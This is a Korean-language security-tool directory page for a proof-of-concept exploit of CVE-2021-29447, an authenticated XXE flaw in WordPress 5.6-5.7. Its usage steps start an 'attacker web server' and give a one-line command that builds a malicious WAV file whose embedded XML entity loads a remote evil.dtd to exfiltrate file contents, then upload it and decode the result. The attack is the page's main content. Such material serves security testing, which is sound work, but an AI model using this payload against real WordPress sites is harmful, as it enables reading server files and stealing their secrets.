Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-29447 — WordPress - 인증된 XXE (CVE-2021-29447) | Kitploit
도구/GitHubGitHub/motikan2010/cve-2021-29447
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubmotikan2010/cve-2021-29447

CVE-2021-29447

WordPress - 인증된 XXE (CVE-2021-29447)

저장소 보기
43114년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

WordPress 5.6-5.7 - 인증된 (Author+) XXE (CVE-2021-29447)

사용 방법

1단계. WordPress 실행

root@kitploit:~
$ make up-wp

2단계. 공격자 웹 서버 실행

root@kitploit:~
$ make up-mal

3단계. 악성 WAV 파일 생성

wavefile npm 없이 (권장)

root@kitploit:~
$ echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://host.docker.internal:8001/evil.dtd'"'"'>%remote;%init;%trick;] >\x00'> malicious.wav

wavefile npm 사용

도구 다운로드
root@kitploit:~
$ make make-wav

4단계. WordPress에 로그인하고 새 미디어에 WAV 파일 업로드

5단계. 디코딩

참고 자료

  • WordPress 5.6-5.7 - 미디어 라이브러리 내 인증된 XXE로 PHP 8에 영향을 주는 보안 취약점